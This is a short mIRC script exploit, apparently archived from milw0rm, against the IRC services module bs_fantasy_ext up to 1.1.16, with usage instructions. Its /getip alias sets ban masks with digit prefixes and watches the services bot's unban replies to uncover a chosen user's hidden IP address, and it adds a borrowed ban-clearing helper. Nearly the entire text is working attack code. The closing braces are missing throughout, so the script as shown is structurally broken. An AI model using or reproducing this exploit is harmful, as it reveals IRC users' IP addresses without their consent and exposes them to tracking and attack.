; bs_fantasy_ext <= 1.1.16 Exploit by Phil
; Kudos to MattT for pointing this out
; Only seems to work for non-vhosted unresolved IPs
; Code is a little inefficient, sorry.
; Usage: /getip <channel> <nickname> <bs bot nickname>
alias getip {
if ($1 != $null && $2 != $null && $3 != $null) {
set %exploit.channel $1
set %exploit.nickname $2
set %exploit.botnick $3
set %exploit.prefix *!*@
set %exploit.counter 1
while (%exploit.counter <= 9) {
mode %exploit.channel +b %exploit.prefix $+ %exploit.counter $+ *
inc %exploit.counter
msg %exploit.channel !unban %exploit.nickname
on 1:UNBAN:#:{
if ($chan == %exploit.channel && $nick == %exploit.botnick) {
set %exploit.prefix $left($banmask, $calc($len($banmask) - 1))
set %exploit.counter 0
unbanall %exploit.channel
while (%exploit.counter <= 9) {
mode %exploit.channel +b %exploit.prefix $+ %exploit.counter $+ *
inc %exploit.counter
if ($right(%exploit.prefix, 1) != .) {
mode %exploit.channel +b %exploit.prefix $+ . $+ *
msg %exploit.channel !unban %exploit.nickname
; Following Code Taken From http://www.hawkee.com/snippet/1661/
alias unbanall {
set %chan $iif($1,$1,$active)
;.timer 0 2 unbanallx
alias unbanallx {
mode %chan +b
if ($ibl(%chan,0)) {
if (%chan ischan) {
if ($me isop %chan) || ($me ishop %chan) {
;mode %chan +b
var %x $ibl(%chan,0)
var %y 0
while (%y <= %x) {
var %banlist = $(%banlist,$ibl(%chan,%y))
inc %y
mode %chan $+(-,$str(b,$ibl(%chan,0))) %banlist
else { echo -a ur not op in %chan }
else { echo -a ur not on %chan }
; milw0rm.com [2009-01-08]